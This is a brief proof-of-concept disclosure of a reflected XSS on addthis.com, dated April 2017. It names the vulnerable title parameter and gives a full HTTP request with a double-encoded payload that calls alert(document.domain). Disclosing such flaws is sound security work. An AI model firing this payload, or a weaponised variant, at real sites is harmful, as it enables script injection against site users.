XSS, addthis.com, Javascript Injection, location.query, Title + URL Parameter

XSS PoC for addthis.com
Target URL High Medium Low Info
http://www.addthis.com on April 2, 2017 0010

Alert Detail
Severity: High (Verified)
Alert: Reflected XSS
Description: Reflected XSS - Cross Site Scripting
URL: http://www.addthis.com
Parameter: location.query via Title and URL Parameters
Other information: CWE-79: Reflected XSS, Javascript Injection

PoC in Chrome (Stable, Current)


REQUEST

GET /bookmark.php?title=%2522%253balert%2528document.domain%2529%252f%252f HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE

[Screenshot: HTTP response for the XSS in addthis.com (request and response)]